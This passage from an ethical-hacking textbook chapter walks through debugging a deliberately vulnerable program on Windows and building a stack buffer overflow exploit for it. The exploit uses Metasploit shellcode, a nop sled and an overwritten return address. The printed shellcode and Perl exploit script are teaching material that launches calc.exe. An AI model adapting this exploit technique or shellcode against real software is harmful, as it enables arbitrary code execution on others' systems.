Microsoft has a shorter version that does exactly the same thing as the previous syntax:
C:\grayhat>set _NT_SYMBOL _PATH=srv*c:\symbols*http://msdl.microsoft.com/
download/symbols
Now that we have the debugger installed, have learned the core commands, and have
set up our symbols path, let’s launch the debugger for the first time. We’ll debug
meet.exe that we built with debugging information (symbols) in the previous section.
Launching the Debugger
In this chapter, we’ll use the cdb debugger. You’re welcome to follow along with the
WinDbg GUI debugger if you’d prefer, but youmay find the command-line debugger to
be an easier quick-start debugger. To launch cdb, pass it the executable to run and any
command-line arguments.
C:\grayhat>md c:\symbols
C:\grayhat>set _NT_SYMBOL_PATH=srv*c:\symbols*http://msdl.microsoft.com/
download/symbols
C:\grayhat>c:\debuggers\cdb.exe meet Mr Haxor
…output truncated for brevity…
(280.f60): Break instruction exception – code 80000003 (first chance)
eax=77fc4c0f ebx=7ffdf000 ecx=00000006 edx=77f51340 esi=00241eb4 edi=00241eb4
eip=77f75554 esp=0012fb38 ebp=0012fc2c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!DbgBreakPoint:
77f75554 cc int 3
0:000>
As you can see from the output of cdb, at every breakpoint it displays the contents of
all registers and the assembly that caused the breakpoint. In this case, a stack trace will
show us why we are stopped at a breakpoint:
0:000> k
ChildEBP RetAddr
0012fb34 77f6462c ntdll!DbgBreakPoint
0012fc90 77f552e9 ntdll!LdrpInitializeProcess+0xda4
0012fd1c 77f75883 ntdll!LdrpInitialize+0x186
00000000 00000000 ntdll!KiUserApcDispatcher+0x7
It turns out that the Windows debugger automatically breaks in after initializing the
process before execution begins. (You can disable this breakpoint by passing -g to cdb
on the command line.) This is handy because at this initial breakpoint, your program
has loaded, and you can set any breakpoints you’d like on your program before execution
begins. Let’s set a breakpoint on main:
0:000> bm meet!main
*** WARNING: Unable to verify checksum for meet.exe
1: 00401060 meet!main
0:000> bl
1 e 00401060 0001 (0001) 0:*** meet!main
(Ignore the checksum warning.) Let’s next run execution past the ntdll initialization
on to our main function.
NOTE During this debug session, the memory addresses shown will likely be
different than the memory addresses in your debugging session.
0:000> g
Breakpoint 1 hit
eax=00320e60 ebx=7ffdf000 ecx=00320e00 edx=00000003 esi=00000000 edi=00085f38
eip=00401060 esp=0012fee0 ebp=0012ffc0 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
meet!main:
00401060 55 push ebp
0:000> k
ChildEBP RetAddr
0012fedc 004013a0 meet!main
0012ffc0 77e7eb69 meet!mainCRTStartup+0x170
0012fff0 00000000 kernel32!BaseProcessStart+0x23
(If you saw network traffic or experienced a delay right there, it was probably the
debugger downloading kernel32 symbols.) Aha!We hit our breakpoint and, again, the
registers are displayed. The command that will next run is push ebp, the first assembly
instruction in the standard function prolog. Now you may remember that in gdb, the
actual source line being executed is displayed. The way to enable that in cdb is the l+s
command. However, don’t get too accustomed to the source line display because, as a
hacker, you’ll almost never have the actual source to view. In this case, it’s fine to display
source lines at the prompt, but you do notwant to turn on source mode debugging (l+t),
because if you were to do that, each “step” through the source would be one source line,
not a single assembly instruction. For more information on this topic, search for
“Debugging in Source Mode” in the debugger help (debugger.chm). On a related note,
the .lines command will modify the stack trace to display the line that is currently being
executed. You will get lines information whenever you have private symbols for the executable
or DLL you are debugging.
0:000> .lines
Line number information will be loaded
0:000> k
ChildEBP RetAddr
0012fedc 004013a0 meet!main [c:\grayhat\meet.c @ 8]
0012ffc0 77e7eb69 meet!mainCRTStartup+0x170
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0.c @ 259]
0012fff0 00000000 kernel32!BaseProcessStart+0x23
If we continue past this breakpoint, our program will finish executing:
0:000> g
Hello Mr Haxor
Bye Mr Haxor
eax=c0000135 ebx=00000000 ecx=00000000 edx=00000000 esi=77f5c2d8 edi=00000000
eip=7ffe0304 esp=0012fda4 ebp=0012fe9c iopl=0 nv up ei pl nz na pe nc
Chapter 11: Basic Windows Exploits
249
PART III
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202
SharedUserData!SystemCallStub+0x4:
7ffe0304 c3 ret
0:000> k
ChildEBP RetAddr
0012fda0 77f5c2e4 SharedUserData!SystemCallStub+0x4
0012fda4 77e75ca4 ntdll!ZwTerminateProcess+0xc
0012fe9c 77e75cc6 kernel32!_ExitProcess+0x57
0012feb0 00403403 kernel32!ExitProcess+0x11
0012fec4 004033b6 meet!__crtExitProcess+0x43
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0dat.c @ 464]
0012fed0 00403270 meet!doexit+0xd6
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0dat.c @ 414]
0012fee4 004013b5 meet!exit+0x10
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0dat.c @ 303]
0012ffc0 77e7eb69 meet!mainCRTStartup+0x185
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0.c @ 267]
0012fff0 00000000 kernel32!BaseProcessStart+0x23
As you can see, in addition to the initial breakpoint before the program starts executing,
the Windows debugger also breaks in after the program has finished executing, just before
the process terminates. You can bypass this breakpoint by passing cdb the -G flag. Next let’s
quit out of the debugger and relaunch it (or use the .restart command) to explore the data
manipulated by the program and to look at the assembly generated by the compiler.
Exploring the Windows Debugger
We’ll next explore how to find the data the debugged application is using. First, let’s
launch the debugger and set breakpoints on main and the greeting function. In this section,
again, the memory addresses shown will likely be different from the memory
addresses you see, so be sure to check where a value is coming from in this example output
before using it directly yourself.
C:\grayhat>c:\debuggers\cdb.exe meet Mr Haxor
...
0:000> bm meet!main
*** WARNING: Unable to verify checksum for meet.exe
1: 00401060 meet!main
0:000> bm meet!*greet*
2: 00401020 meet!greeting
0:000> g
Breakpoint 1 hit
...
meet!main:
00401060 55 push ebp
0:000>
From looking at the source, we know that main should have been passed the command
line used to launch the program via the argc command string counter and argv,
which points to the array of strings. To verify that, we’ll use dv to list the local variables,
and then poke around in memory with dt and db to find the value of those variables.
0:000> dv /V
0012fee4 @ebp+0x08 argc = 3
0012fee8 @ebp+0x0c argv = 0x00320e00
Gray Hat Hacking: The Ethical Hacker’s Handbook
250
Chapter 11: Basic Windows Exploits
251
PART III
0:000> dt argv
Local var @ 0x12fee8 Type char**
0x00320e00
-> 0x00320e10 "meet"
From the dv output, we see that argc and argv are, indeed, local variables with argc
stored 8 bytes past the local ebp, and argv stored at ebp+0xc. The dt command shows
the data type of argv to be a pointer to a character pointer. The address 0x00320e00
holds that pointer to 0x00320e10 where the data actually lives. Again, these are our values—
yours will probably be different.
0:000> db 0x00320e10
00320e10 6d 65 65 74 00 4d 72 00-48 61 78 6f 72 00 fd fd meet.Mr.Haxor...
Let’s continue on until we hit our second breakpoint at the greeting function.
0:000> g
Breakpoint 2 hit
...
meet!greeting:
00401020 55 push ebp
0:000> kP
ChildEBP RetAddr
0012fecc 00401076 meet!greeting(
char * temp1 = 0x00320e15 "Mr",
char * temp2 = 0x00320e18 "Haxor")
0012fedc 004013a0 meet!main(
int argc = 3,
char ** argv = 0x00320e00)+0x16
0012ffc0 77e7eb69 meet!mainCRTStartup(void)+0x170
0012fff0 00000000 kernel32!BaseProcessStart+0x23
You can see from the stack trace (or the code) that greeting is passed the two arguments
we passed into the program as char *. So you might be wondering, “how is the
stack currently laid out?” Let’s look at the local variables and map it out.
0:000> dv /V
0012fed4 @ebp+0x08 temp1 = 0x00320e15 "Mr"
0012fed8 @ebp+0x0c temp2 = 0x00320e18 "Haxor"
0012fd3c @ebp-0x190 name = char [400] "???"
The variable name is 0x190 above ebp. Unless you think in hex, you need to convert
that to decimal to put together a picture of the stack. You can use calc.exe to compute
that or just ask the debugger to show the value 190 in different formats, like this:
0:000> .formats 190
Evaluate expression:
Hex: 00000190
Decimal: 400
So it appears that our variable name is 0x190 (400) bytes above ebp. Our two arguments
are a few bytes after ebp. Let’s do the math and see exactly how many bytes are
between the variables and then reconstruct the entire stack frame. If you’re following
Gray Hat Hacking: The Ethical Hacker’s Handbook
252
along, step past the function prolog where the correct values are popped off the stack
before trying to match up the numbers. We’ll go through the assembly momentarily.
For now, just press P three times to get past the prolog and then display the registers. (pr
disables and enables the register display along the way.)
0:000> pr
meet!greeting+0x1:
00401021 8bec mov ebp,esp
0:000> p
meet!greeting+0x3:
00401023 81ec90010000 sub esp,0x190
0:000> pr
eax=00320e15 ebx=7ffdf000 ecx=00320e18 edx=00320e00 esi=00000000 edi=00085f38
eip=00401029 esp=0012fd3c ebp=0012fecc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
meet!greeting+0x9:
00401029 8b450c mov eax,[ebp+0xc] ss:0023:0012fed8=00320e18
All right, let’s build up a picture of the stack, starting from the top of this stack frame
(esp). At esp (0x0012fd3c for us; it might be different for you),we find the function variable
name, which then goes on for the next 400 (0x190) bytes. Let’s see what comes
next:
0:000> .formats esp+190
Evaluate expression:
Hex: 0012fecc
Okay, esp+0x190 (or esp+400 bytes) is 0x0012fecc. That value looks familiar. In fact,
if you look at the preceding registers display (or use the r command), you’ll see that ebp
is 0x0012fecc. So ebp is stored directly after name.We know that ebp is a 4-byte pointer,
so let’s see what’s after that.
0:000> dd esp+190+4 l1
0012fed0 00401076
NOTE The I1 (the letter l followed by the number 1) after the address tells
the debugger to display only one of whatever type is being displayed. In this
case,we are displaying double words (4 bytes) and we want to display one (1)
of them. For more info on range specifiers, see the debugger.chm HTML help
topic “Address and Address Range Syntax.”
That’s another value that looks familiar. This time, it’s the function return address:
0:000> k
ChildEBP RetAddr
0012fecc 00401076 meet!greeting+0x9
0012fedc 004013a0 meet!main+0x16
0012ffc0 77e7eb69 meet!mainCRTStartup+0x170
0012fff0 00000000 kernel32!BaseProcessStart+0x23
Chapter 11: Basic Windows Exploits
253
PART III
When you correlate the next adjacent memory address and the stack trace, you see
that the return address (saved eip) is stored next on the stack. And after eip come our
function parameters that were passed in:
0:000> dd esp+190+4+4 l1
0012fed4 00320e15
0:000> db 00320e15
00320e15 4d 72 00 48 61 78 6f 72-00 fd fd fd fd ab ab ab Mr.Haxor........
Now that we have inspected memory ourselves, we can believe the graph shown in
Chapter 7, shown again in Figure 11-1.
Disassembling with CDB
To disassemble using the Windows debugger, use the u or uf (unassembled function)
command. The u command will disassemble a few instructions, with subsequent u
commands disassembling the next few instructions. In this case, because we want to see
the entire function, we’ll use uf.
0:000> uf meet!greeting
meet!greeting:
00401020 55 push ebp
00401021 8bec mov ebp,esp
00401023 81ec90010000 sub esp,0x190
00401029 8b450c mov eax,[ebp+0xc]
0040102c 50 push eax
0040102d 8d8d70feffff lea ecx,[ebp-0x190]
00401033 51 push ecx
00401034 e8f7000000 call meet!strcpy (00401130)
00401039 83c408 add esp,0x8
0040103c 8d9570feffff lea edx,[ebp-0x190]
00401042 52 push edx
00401043 8b4508 mov eax,[ebp+0x8]
00401046 50 push eax
00401047 68405b4100 push 0x415b40
0040104c e86f000000 call meet!printf (004010c0)
00401051 83c40c add esp,0xc
00401054 8be5 mov esp,ebp
00401056 5d pop ebp
00401057 c3 ret
If you cross-reference this disassembly with the disassembly created on Linux in
Chapter 6, you’ll find it to be almost identical. The trivial differences are in choice of registers
and semantics.
Figure 11-1
Stack layout of
function call
References
Information on /Gs[-] flag http://msdn2.microsoft.com/en-gb/library/8dbf701c.aspx
Compiler Flags http://msdn2.microsoft.com/en-gb/library/fwkeyyhe.aspx
Debugging on Windows with OllyDbg
A popular user-mode debugger is OllyDbg, which can be found at www.ollydbg.de. As
can be seen in Figure 11-2, the OllyDbg main screen is split into four sections. The Code
section is used to view assembly of the binary. The Registers section is used to monitor
the status of registers in real time. The Hex Dump section is used to view the raw hex of
the binary. The Stack section is used to view the stack in real time. Each section has context-
sensitive menus available by right-clicking in that section.
You may start debugging a program with OllyDbg in three ways:
• Open OllyDbg program; then select File | Open.
• Open OllyDbg program; then select File | Attach.
• Invoke from command line, for example, from a Metasploit shell as follows:
$Perl –e "exec '
Gray Hat Hacking: The Ethical Hacker’s Handbook
254
Figure 11-2 Main screen of OllyDbg
For example, to debug our favorite meet.exe and send it 408 As, simply type
$ Perl -e "exec 'F:\\toolz\\odbg110\\OLLYDBG.EXE', 'c:\\meet.exe', 'Mr',('A'
x 408)"
The preceding command line will launch meet.exe inside of OllyDbg.
When learning OllyDbg, you willwant to knowthe following common commands:
Shortcut Purpose
F2 Set breakpoint (bp)
F7 Step into a function
F8 Step over a function
F9 Continue to next bp, exception, or exit
CTRL-K Show call tree of functions
SHIFT-F9 Pass exception to program to handle
Click in code section, press ALT-E for list of
linked executable modules
List of linked executable modules
Right-click on register value, select Follow
in Stack or Follow in Dump
Look at stack or memory location that
corresponds to register value
CTRL-F2 Restart debugger
When you launch a program in OllyDbg, the debugger automatically pauses. This
allows you to set breakpoints and examine the target of the debugging session before
continuing. It is always a good idea to start off by checking what executable modules are
linked to our program (ALT-E).
Chapter 11: Basic Windows Exploits
255
PART III
In this case, we see that only kernel32.dll and ntdll.dll are linked to meet.exe. This information
is useful to us. We will see later that those programs contain opcodes that are
available to us when exploiting.
Now we are ready to begin the analysis of this program. Since we are interested in the
strcpy in the greeting function, let’s find it by starting with the Executable Modules window
we already have open (ALT-E). Double-click on the meet module from the executable
modules window and you will be taken to the function pointers of the meet.exe
program. You will see all the functions of the program, in this case greeting and main.
Arrow down to the “JMP meet.greeting” line and press ENTER to follow that JMP statement
into the greeting function.
NOTE if you do not see the symbol names such as “greeting”, “strcpy”, and
“printf”, then either you have not compiled the binary with debugging
symbols, or your OllyDbg symbols server needs to be updated by copying the
dbghelp.dll and symsrv.dll files from your debuggers directory to the Ollydbg
folder. This is not a problem; they are merely there as a convenience to the user and can be
worked around without symbols.
Now that we are looking at the greeting function, let’s set a breakpoint at the vulnerable
function call (strcpy). Arrow down until we get to line 0x00401034. At this line press
F2 to set a breakpoint; the address should turn red. Breakpoints allow us to return to this
point quickly. For example, at this point we will restart the program with CTRL-F2 and
then press F9 to continue to the breakpoint. You should now see OllyDbg has halted on
the function call we are interested in (strcpy).
Now that we have a breakpoint set on the vulnerable function call (strcpy), we can
continue by stepping over the strcpy function (press F8). As the registers change, you will
see them turn red. Since we just executed the strcpy function call, you should see many
of the registers turn red. Continue stepping through the program until you get to line
0x00401057, which is the RETN from the greeting function. You will notice that the
debugger realizes the function is about to return and provides you with useful information.
For example, since the saved eip has been overwritten with four As, the debugger
indicates that the function is about to return to 0x41414141. Also notice how the function
epilog has copied the address of esp into ebp and then popped four As into that
location (0x0012FF64 on the stack).
Gray Hat Hacking: The Ethical Hacker’s Handbook
256
As expected, when you press F8 one more time, the program will fire an exception. This is
called a first chance exception, as the debugger and program are given a chance to handle
the exception before the program crashes. You may pass the exception to the program
by pressing SHIFT-F9. In this case, since there are no exception handlers in place, the program
crashes.
After the program crashes, you may continue to inspect memory locations. For example,
you may click in the stack section and scroll up to see the previous stack frame (that
we just returned from, which is now grayed out). You can see (on our system) that the
beginning of our malicious buffer was at 0x0012FDD0.
Chapter 11: Basic Windows Exploits
257
PART III
Gray Hat Hacking: The Ethical Hacker’s Handbook
258
To continue inspecting the state of the crashed machine, within the stack section,
scroll back down to the current stack frame (current stack frame will be highlighted).
You may also return to the current stack frame by clicking on the ESP register value to
select it, then right-clicking on that selected value and selecting Follow in Stack. You will
notice that a copy of the buffer is also located at the location esp+4. Information like
this becomes valuable later as we choose an attack vector.
Those of you who are visually stimulated will find OllyDbg very useful. Remember,
OllyDbg only works in user space. If you need to dive into kernel space, you will have to
use another debugger like WinDbg or SoftIce.
Reference
Information on fixing OllyDbg www.exetools.com/forum/showthread.php?t=5971&goto=
nextoldest
Windows Exploits
In this section, we will learn to exploit Windows systems.We will start off slowly, building
on previous concepts learned in the Linux chapters. Then we will take a leap into
reality and work on a real-world Windows exploit.
Building a Basic Windows Exploit
Now that you’ve learned how to debug on Windows, how to disassemble on Windows,
and about the Windows stack layout, you’re ready to write a Windows exploit! This section
will mirror the Chapter 7 exploit examples that you completed on Linux to show you
that the same kind of exploits are written the same way on Windows. The end goal of this
section is to cause meet.exe to launch an executable of our choice based on shellcode
passed in as arguments. We will use shellcode written by H.D. Moore for his Metasploit
project (see Chapter 5 for more info on Metasploit). Beforewe can drop shellcode into the
arguments to meet.exe, however, we need to prove that we can first crash meet.exe and
then control eip instead of crashing, and then finally navigate to our shellcode.
Chapter 11: Basic Windows Exploits
259
PART III
Crashing meet.exe and Controlling eip
As you saw from Chapter 7, a long parameter passed to meet.exe will cause a segmentation
fault on Linux.We’d like to cause the same type of crash on Windows, but Perl is not
included on Windows. So to build this exploit, you’ll need to either use the Metasploit
Cygshell or download ActivePerl from www.activestate.com/Products/ActivePerl/ to
your Windows machine. (It’s free.) Both work well. Since we have used the Metasploit
Cygshell so far, you may continue using that throughout this chapter if you like. To show
you the other side, we will try ActivePerl for the rest of this section. After you download
and install Perl for Windows, you can use it to build malicious parameters to pass to
meet.exe. Windows, however, does not support the same backtick (`) notation we used
on Linux to build up command strings, so we’ll use Perl as our execution environment
and our shellcode generator. You can do this all on the command line, but it might be
handy to instead build a simple Perl script that you can modify as we add more and
more to this exploit throughout the section.We’ll use the exec Perl command to execute
arbitrary commands and also to explicitly break up command-line arguments (as this
demo is heavy on the command-line arguments).
C:\grayhat>type command.pl
exec 'c:\\debuggers\\ntsd','-g','-G','meet','Mr.',("A" x 500)
Because the backslash is a special escape character to Perl, we need to include two of
them each time we use it. Also, we’re moving to ntsd for the next few exploits so the
command-line interpreter doesn’t try to interpret the arguments we’re passing. If you
experiment later in the chapter with cdb instead of ntsd, you’ll notice odd behavior,
with debugger commands you type sometimes going to the command-line interpreter
instead of the debugger. Moving to ntsd will remove the interpreter from the picture.
C:\grayhat>Perl command.pl
... (moving to the new window) ...
Microsoft (R) Windows Debugger Version 6.6.0007.5
Copyright (C) Microsoft Corporation. All rights reserved.
CommandLine: meet Mr. AAAAAAA [rest of As removed]
...
(740.bd4): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Eax=41414141 ebx=7ffdf000 ecx=7fffffff edx=7ffffffe esi=00080178 edi=00000000
eip=00401d7c esp=0012fa4c ebp=0012fd08 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
*** WARNING: Unable to verify checksum for meet.exe
meet!_output+0x63c:
00401d7c 0fbe08 movsx ecx,byte ptr [eax] ds:0023:41414141=??
0:000> kP
ChildEBP RetAddr
0012fd08 00401112 meet!_output(
struct _iobuf * stream = 0x00415b90,
char * format = 0x00415b48 " %s.",
char * argptr = 0x0012fd38 "??")+0x63c
0012fd28 00401051 meet!printf(
char * format = 0x00415b40 "Hello %s %s.",
int buffing = 1)+0x52
Gray Hat Hacking: The Ethical Hacker’s Handbook
260
0012fecc 41414141 meet!greeting(
char * temp1 = 0x41414141 "",
char * temp2 = 0x41414141 "")+0x31
WARNING: Frame IP not in any known module. Following frames may be wrong.
41414141 00000000 0x41414141
0:000>
As you can see from the stack trace (and as you might suspect because you’ve done
this before), 500 As corrupted the parameters passed to the greeting function, so we
don’t hit the strcpy overflow. You know from Chapter 7 and from our stack construction
section earlier that eip starts 404 bytes after the start of the name buffer and is 4 bytes
long. We want to overwrite the range of bytes 404–408 past the beginning of name.
Here’s what that looks like:
C:\grayhat>Perl –e "exec 'c:\\debuggers\\ntsd','-g','-G','meet','Mr.',("A" x
408)"
... (debugger loads in new window) ...
CommandLine: meet Mr. AAAAAAAAAAAAAAAAAAAAAAAAAA [rest of As removed]
(9bc.56c): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Eax=000001a3 ebx=7ffdf000 ecx=00415b90 edx=00415b90 esi=00080178 edi=00000000
eip=41414141 esp=0012fed4 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
41414141 ?? ???
0:000>
We now control eip!The next step is to test our chosen shellcode, and then we’ll put
the pieces together to build the exploit.
Testing the Shellcode
Just as we did with Aleph1’s shellcode in Linux, let’s build a simple test of the shellcode.
The Metasploit shellcode is well respected in the security community, so we’ll build this
first exploit test using Metasploit shellcode. Remember that our goal is to cause meet.exe
to launch an executable of our choice based on the shellcode. For this demo, let’s force
meet.exe to launch the Windows calculator, calc.exe. Metasploit’s web page will build
custom shellcode for us by filling in a few fields in a web form. Browse to
www.metasploit.com:55555/PAYLOADS?MODE=SELECT&MODULE=win32_exec
Set the CMD field to calc.exe and click Generate Payload. Figure 11-3 shows what the
web page should look like before clicking Generate Payload.
On the resulting page, copy the C-formatted shellcode (the first set of shellcode) into
the test program you built in Chapter 7 to exercise the shellcode:
C:\grayhat>type shellcode.c
/* win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub
#http://metasploit.com */
unsigned char scode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e"
"\x46\xd4\xd6\x83\xeb\xfc\xe2\xf4\xe2\xae\x90\xd6\x1e\x46\x5f\x93"
"\x22\xcd\xa8\xd3\x66\x47\x3b\x5d\x51\x5e\x5f\x89\x3e\x47\x3f\x9f"
"\x95\x72\x5f\xd7\xf0\x77\x14\x4f\xb2\xc2\x14\xa2\x19\x87\x1e\xdb"
Chapter 11: Basic Windows Exploits
261
PART III
"\x1f\x84\x3f\x22\x25\x12\xf0\xd2\x6b\xa3\x5f\x89\x3a\x47\x3f\xb0"
"\x95\x4a\x9f\x5d\x41\x5a\xd5\x3d\x95\x5a\x5f\xd7\xf5\xcf\x88\xf2"
"\x1a\x85\xe5\x16\x7a\xcd\x94\xe6\x9b\x86\xac\xda\x95\x06\xd8\x5d"
"\x6e\x5a\x79\x5d\x76\x4e\x3f\xdf\x95\xc6\x64\xd6\x1e\x46\x5f\xbe"
"\x22\x19\xe5\x20\x7e\x10\x5d\x2e\x9d\x86\xaf\x86\x76\xb6\x5e\xd2"
"\x41\x2e\x4c\x28\x94\x48\x83\x29\xf9\x25\xb5\xba\x7d\x68\xb1\xae"
"\x7b\x46\xd4\xd6";
int main()
{
int *ret; // ret pointer for manipulating saved return
ret = (int *)&ret + 2; // set ret to point to the saved return
// value on the stack.
(*ret) = (int)scode;
}
C:\grayhat>cl shellcode.c
...
C:\grayhat>shellcode.exe
This harness should just launch our shellcode that simply launches calc.exe. The
shellcode isn’t optimized for calc.exe, but it’s definitely easier to get non-optimized
shellcode from a web page than to build optimized shellcode ourselves. The result of
this execution is shown in Figure 11-4.
Bingo—the shellcode works! You may be wondering why the program crashed after
calling the calculator. As seen in Figure 11-3, the default setting for EXITFUNC is “seh”,
which will expect a stored exception handler when exiting. Since we don’t have any
stored exception handlers registered, the program will crash. To avoid this, we could
have selected “thread” to safely kill the thread when exiting the main function. Now let’s
move on toward our goal of exploiting meet.exe to do the same thing.
Figure 11-3 Screenshots of Metasploit shellcode generator
Gray Hat Hacking: The Ethical Hacker’s Handbook
262
Getting the Return Address
Just as you did with Linux, build a small utility to get the return address:
C:\grayhat>type get_sp.c
get_sp() { __asm mov eax, esp }
int main(){
printf("Stack pointer (ESP): 0x%x\n", get_sp());
}
C:\grayhat>cl get_sp.c
... (compiler output removed for brevity) ...
C:\grayhat>get_sp.exe
Stack pointer (ESP): 0x12ff60
Onthis Windows XP machine,we can reliably use the stack pointer address 0x0012ff60
in this specific situation. Notice, however, that the first byte of the 4-byte pointer address is
0x00 (get_sp.exe doesn’t showit explicitly, but it is implied because it shows only 3 bytes).
The strcpy we are about to exploit will stop copying when it hits that null byte (0x00).
Thankfully, the null byte comes as the first byte of the address andwe will be reversing it to
place it on the stack, so the null byte will safely become the last byte passed on the command
line. This means we can still pull off the exploit, but we can’t repeat the return
address. In this case, our exploit sandwich will be a short nop sled, the shellcode, nops to
extend to byte 404, then a single copy of our return address at byte 404.
Figure 11-4 Testing our shellcode to execute the calc.exe command
Chapter 11: Basic Windows Exploits
263
PART III
Building the Exploit Sandwich
Let’s go back to our command.pl to build the exploit. For this, you’ll want to again copy
and paste the Metasploit shellcode generated earlier. This time, use the Perl-formatted
shellcode on the generated shellcode result page to save yourself some reformatting. (Or
you can just paste in the C-formatted shellcode and add a period after each line.) This
version of the shellcode is 164 bytes, and we want the shellcode and our nops to extend
404 bytes, so we’ll start with a 24-byte nop sled and 216 more nops (or anything, really)
after the shellcode. Also, we need to subtract 408 bytes (0x190 +0x8) from the return
address so we end up right at the top of our nop sled where execution will slide right
into our shellcode. Let’s try it out!
NOTE Depending on the version of Metasploit and other settings you select,
the size of your shellcode may vary. It is the process that is important here,
not the exact size of the example.
C:\grayhat>type command.pl
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub
#http://metasploit.com
my $shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6".
"\x9d\x6d\xaf\x83\xeb\xfc\xe2\xf4\x4a\x75\x29\xaf\xb6\x9d\xe6\xea".
"\x8a\x16\x11\xaa\xce\x9c\x82\x24\xf9\x85\xe6\xf0\x96\x9c\x86\xe6".
"\x3d\xa9\xe6\xae\x58\xac\xad\x36\x1a\x19\xad\xdb\xb1\x5c\xa7\xa2".
"\xb7\x5f\x86\x5b\x8d\xc9\x49\xab\xc3\x78\xe6\xf0\x92\x9c\x86\xc9".
"\x3d\x91\x26\x24\xe9\x81\x6c\x44\x3d\x81\xe6\xae\x5d\x14\x31\x8b".
"\xb2\x5e\x5c\x6f\xd2\x16\x2d\x9f\x33\x5d\x15\xa3\x3d\xdd\x61\x24".
"\xc6\x81\xc0\x24\xde\x95\x86\xa6\x3d\x1d\xdd\xaf\xb6\x9d\xe6\xc7".
"\x8a\xc2\x5c\x59\xd6\xcb\xe4\x57\x35\x5d\x16\xff\xde\x72\xa3\x4f".
"\xd6\xf5\xf5\x51\x3c\x93\x3a\x50\x51\xfe\x0c\xc3\xd5\xb3\x08\xd7".
"\xd3\x9d\x6d\xaf";
# get_sp gave us 0x12ff60. Subtract 0x198 for buffer of 408 bytes
my $return_address = "\xC8\xFD\x12\x00";
my $nop_before = "\x90" x 24;
my $nop_after = "\x90" x 216;
my $payload = $nop_before.$shellcode.$nop_after.$return_address;
exec 'meet','Mr.',$payload
Notice that we have added thread-safe shellcode, regenerated from the Metasploit site.
C:\grayhat>Perl command.pl
C:\grayhat>Hello Mr. nV
Bye Mr. nV
… truncated for brevity …
The calculator popped up this time (without a crash)—success!To slow it down a bit
and gain experience with the debugger, change the last line of the script to:
exec 'c:\\debuggers\\ntsd', '-g', '-G', 'meet', 'Mr.', $payload;
Gray Hat Hacking: The Ethical Hacker’s Handbook
264
Now start the program again.
C:\grayhat>Perl command.pl
NOTE If your debugger is not installed in c:\debuggers, you’ll need to change
the exec line in your script.
Voilà!Calc.exe pops up again after the debugger runs in the background. Let’s walk
through how to debug if something went wrong. First, take out the -g argument to ntsd
so you get an initial breakpoint from which you can set breakpoints. Your new exec line
should look like this:
exec 'c:\\debuggers\\ntsd', '-G', 'meet', 'Mr.', $payload;
Next run the script again, setting a breakpoint on meet!greeting.
C:\grayhat>Perl command.pl
...
Microsoft I Windows Debugger Version 6.6.0007.5
Copyright (C) Microsoft Corporation. All rights reserved.
CommandLine: meet Mr. t$s
nifÆ
…
0:000> uf meet!greeting
meet!greeting:
00401020 55 push ebp
00401021 8bec mov ebp,esp
00401023 81ec90010000 sub esp,0x190
00401029 8b450c mov eax,[ebp+0xc]
0040102c 50 push eax
0040102d 8d8d70feffff lea ecx,[ebp-0x190]
00401033 51 push ecx
00401034 e8f7000000 call meet!strcpy (00401130)
00401039 83c408 add esp,0x8
0040103c 8d9570feffff lea edx,[ebp-0x190]
00401042 52 push edx
00401043 8b4508 mov eax,[ebp+0x8]
00401046 50 push eax
00401047 68405b4100 push 0x415b40
0040104c e86f000000 call meet!printf (004010c0)
00401051 83c40c add esp,0xc
00401054 8be5 mov esp,ebp
00401056 5d pop ebp
00401057 c3 ret
There’s the disassembly. Let’s set a breakpoint at the strcpy and the ret to watch what
happens. (Remember, these are our memory addresses for the strcpy function and the
return. Be sure to use the values from your disassembly output.)
0:000> bp 00401034
0:000> bp 00401057
0:000> g
Breakpoint 0 hit
eax=00320de1 ebx=7ffdf000 ecx=0012fd3c edx=00320dc8 esi=7ffdebf8 edi=00000018
eip=00401034 esp=0012fd34 ebp=0012fecc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
Chapter 11: Basic Windows Exploits
265
PART III
meet!greeting+0x14:
00401034 e8f7000000 call meet!strcpy (00401130)
0:000> k
ChildEBP RetAddr
0012fecc 00401076 meet!greeting+0x14
0012fedc 004013a0 meet!main+0x16
0012ffc0 77e7eb69 meet!mainCRTStartup+0x170
0012fff0 00000000 kernel32!BaseProcessStart+0x23
The stack trace looks correct before the strcpy.
0:000> p
eax=0012fd3c ebx=7ffdf000 ecx=00320f7c edx=fdfdfd00 esi=7ffdebf8 edi=00000018
eip=00401039 esp=0012fd34 ebp=0012fecc iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
meet!greeting+0x19:
00401039 83c408 add esp,0x8
0:000> k
ChildEBP RetAddr
0012fecc 0012fd44 meet!greeting+0x19
WARNING: Frame IP not in any known module. Following frames may be wrong.
90909090 00000000 0x12fd3c
And after the strcpy, we’ve overwritten the return value with the location of (hopefully)
our nop sled and subsequent shellcode. Let’s check to be sure:
0:000> db 0012fd44
